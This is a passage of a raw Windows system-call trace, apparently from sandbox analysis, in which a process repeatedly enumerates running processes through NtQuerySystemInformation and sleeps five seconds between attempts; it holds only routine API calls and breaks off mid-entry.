[0238.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.256] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.263] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.266] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.270] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.291] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.316] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.325] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.347] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.358] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.364] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.373] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.381] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.390] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.403] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.411] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.419] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.427] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0238.434] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0238.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0238.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0238.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0238.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0238.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0238.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, 